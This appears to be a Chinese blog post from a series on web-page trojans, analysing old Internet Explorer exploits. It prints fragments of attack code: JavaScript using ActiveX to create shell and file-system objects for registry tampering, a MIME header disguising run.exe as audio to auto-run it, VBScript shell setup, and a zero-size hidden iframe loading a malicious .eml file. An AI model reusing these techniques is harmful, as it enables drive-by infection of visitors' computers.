国内资深黑客详谈网页木马(7)

最新推荐文章于 2021-03-27 09:54:50 发布
最新推荐文章于 2021-03-27 09:54:50 发布
阅读量749 收藏
点赞数
分类专栏: 木马 文章标签: internet initialization extension function javascript applet

 六、常用网页木马运行原理的分析

1.javascript.Exception.Exploit

常用的攻击代码:

Function destroy(){
try
{
//ActiveX initialization 初始化ActiveX,为修改注册表做准备
a1=document.applets[0]; 
//获取applet运行对象,以下语句指向注册表中有关IE的表项
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
开始进行破坏
}
}
catch(e)
{}
}
catch(e)
{}
}
function do()
{
//初始化函数,并每隔一秒执行修改程序
setTimeout("destroy()", 1000); //设定运行时间1秒
}
Do() //进行破坏的执行函数指令
这个代码是javascript编写,很简单,但却可以修改受影响系统的注册表,释放垃圾文件,格式化硬盘等。

2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头
常用的攻击代码:


Content-Type: multipart/related;
type="multipart/alternative";
boundary="====B===="
--====B====
Content-Type: multipart/alternative;
boundary="====A===="
--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

--====A====--
--====B====
Content-Type: audio/x-wav;
name="run.exe"
Content-Transfer-Encoding: base64
Content-ID:   ---以下省略AAAAA N+1个---
把run.exe 的类型定义为audio/x-wav,这是利用客户端支持的 MIME(多部分网际邮件扩展,Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,,结果导致邮件文件x.eml 中的附件run.exe被执行。在win2000上,即使是用鼠标点击下载下来的 x.eml,或是拷贝粘贴,都会导致x.eml中的附件被运行。整个程序的运行还是依靠x.eml这个文件来支持。Content-Transfer- Encoding: base64 Content-ID: 从中可以看出,由于定义后字符格式为base64,那么一下的代码全部为加密过的代码,里面可以是任何执行的命令:
〈script language=vbs〉
On Error Resume Next• 容错语句,避免程序崩溃
set aa=CreateObject("WScript.Shell")•建立WScript对象
Set fs = CreateObject("Scripting.FileSystemObject")•建立文件系统对象
Set dir1 = fs.GetSpecialFolder(0)•得到Windows路径
Set dir2 = fs.GetSpecialFolder(1)•得到System路径
……省略……
之所以有的病毒不能准确的清除全部的病毒体,是因为很多杀毒软件,病毒监控只杀当时查到的,却不能处理新建的文件。

3.Iframe  漏洞的利用

常用攻击代码:
(1)


(2)
〈iframe src=run.eml width=0 height=0〉〈/iframe〉
常见的木马运用格式,高度和宽度为0的一个框架网页。

(3)

一个框架引用的新方式,对type="text/x-scriptlet" 的调整后,就可以实现和eml格式文件同样的效果。

4.Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞的利用

常见攻击代码:

----- code cut start for run.asp -----

 

----- code cut end for run.asp -----

 

hack8
关注
专栏目录
网页嵌入式木马之我所见
03-31 2683
几天前我中了一个木马,当时我很纳闷,我第一没有收过邮件,第二没有收过朋友从QQ里传来的文件,为什么我会中木马呢?于是查了一下有关资料,才发现网页也有嵌入的可能。究其原因,这是因为微软公司的在2000年发布的MIME/BASE64处理漏洞所引起的,不过这个漏洞只适用于IE5.5以下的版本的浏览器。那么MIME是什么呢?其实MIME是Multimedia Internet Mail Extension
恶意代码大暴光
sandy的开发乐园
02-09 896
许多网友纷纷指出有的网站不择手段,当用户访问过它们的网页后,不仅IE默认首页被篡改了,而且每次开机 后IE都会自动弹出访问该网站。  我们通过对下面这段javascript程序的解剖,希望读者能明白其究竟,并掌握修复的方法。网站应该用丰富精彩的栏目来吸引访问者,希望通过对用户注册表的恶意篡改来达到提高访问 量的目的不仅会事得其反,更是一 种不道德的行为。   下面就来说说怎样通过html文件
网页恶意代码全集大观
热门推荐
生活要精彩
02-23 2万+
大家上网时自己的IE有时不知怎么回事,首页、标题栏等各项都改成他们的宣传和广告,十分让人头疼,现在把他们的内幕提示出来!   其实这些都是利用了ACTIVE和JS做到的,我们来看这段危险代码。如果浏览了这个网页的话IE跟系统都会被修改得不象样,仅仅可以使用WINDOWS的基本程序。够狠的了。    下面的java程序究竟在搞什么鬼?我们来逐步分析它: //启动ActiveX,以便可以
Java实现OPC通信---utgard
weixin_30636089的博客
05-08 1048
一.OPC 1.使用的OPC server软件: 模拟仿真用的 MatrikonOPCSimulation(50M),https://pan.baidu.com/share/init?surl=9rcHEBGSWGMSkRo1kEY6fQ,密码: mcur 项目使用KEPServer V6(450M,中文),https://pan.baidu.com/share/init?surl=3B...
WEB常见的攻击方式有哪些?如何防御?
茉莉蜜茶~~~
03-26 1637
一、 什么是web攻击 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为 如植入恶意代码,修改网站权限,获取网站用户隐私信息等等 Web应用程序的安全性是任何基于Web业务的重要组成部分 确保Web应用程序安全十分重要,即使是代码中很小的 bug 也有可能导致隐私信息被泄露 站点安全就是为保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践 我们常见的Web攻击方式有 XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-
基于变形方法的网页木马免杀相关技术分析.pdf
04-07
木马导致的网络不安全性已经引起了社会各界的普遍关注,尤其是网络木马带来的盗号、流氓软件、拒服务供给等黑客行为给人们的工作和生活带来了较大的安全隐患,所以加强对基于变形方法网页木马免杀的研究力度具有非常...
网络雷达.查黑客木马必备软件
12-19
黑客木马必备软件 上网时,就怕黑客。下载软件时就怕木马黑客木马都要使用网络连接。点开这个软件,所有连接一目了然。如果怀疑有黑客,关掉所有软件,点开雷达查查;下载的新软件是否有木马,看看是否有网络...
你知道吗?CSS样式表也能挂网页木马
09-27
网页制作Webjx文章简介:随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范IFRAME挂马的CSS...
网络连接监控.rar查黑客木马必备软件
12-19
黑客木马必备软件 上网时,就怕黑客。下载软件时就怕木马黑客木马都要使用网络连接。点开这个软件,所有连接一目了然。如果怀疑有黑客,关掉所有软件,点开雷达查查;下载的新软件是否有木马,看看是否有网络...
常用电脑类标识符CLSID,方便你编辑注册表
02-15
常用电脑类标识符CLSID,方便你编辑注册表
获得COM组件(ocx、dll)的CLSID小工具
10-14
不用OLE View工具,也可以获得com组件(ocx、dll)的类名和对应的clsid。此工具通过访问注册表,获得某个已经注册的com组件(ocx、dll)的所有类名和对应的clsid。
获取控件CLSID的方法
MaklonZjing
02-03 5193
----对于小型程序不宜采取第二种方法,较好的方法是在程序中嵌入注册代码,实现应用程序自注册。其编程方法是:使用WindowsAPI函数LoadLibrary载入ActiveX控件;使用GetProcAddress函数获取ActiveX控件中注册函数DllRegisterServer(注销函数为DllUnregisterServer)指针;调用注册函数DllRegisterServer(或注销函数
java opc client 开源Utgard学习及踩坑
lgbisha的博客
09-29 1万+
最近的项目中需要运用到opc client。需要从opc server中获取数据,或修改参数。主要运用的语言为java。 准备知识:opc server 协议 OPC DA: Data Access协议,是最基本的OPC协议。OPC DA服务器本身不存储数据,只负责显示数据收集点的当前值。客户端可以设置一个refresh interval,定期刷新这个值。目前常见的协议版本号为2.0和3.0,...
Http 常见 Content-Type 有哪些?
josavion的博客
03-27 1万+
Content-type 定义了 http 请求的数据类型。 如果设置在请求头中,则定义的是请求体的数据类型; 如果设置在响应头中,则定义的是响应体的数据类型; 请求头--Request-Headers:一般我们在 post 请求中会向服务器发送一些参数,那我们就可以通过这个参数设置 post 的参数格式 application/json:JSON 数据格式; application/x-www-form-urlencoded:表单默认的提数据格式; multipart/form-data:
HTTP Content-type 对照表
dietan8353的博客
11-04 2606
HTTP Content-type 对照表 Content-Type,内容类型,一般是指网页中存在的Content-Type,用于定义网络文件的类型和网页的编码,决定浏览器将以什么形式、什么编码读取这个文件,比如用PHP输出图片文件、JSON数据、XML文件等非HTML内容时,就必须用header函数来指定Content-Type,才能达到输出一张图片或是其它指定内容类型的需求。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值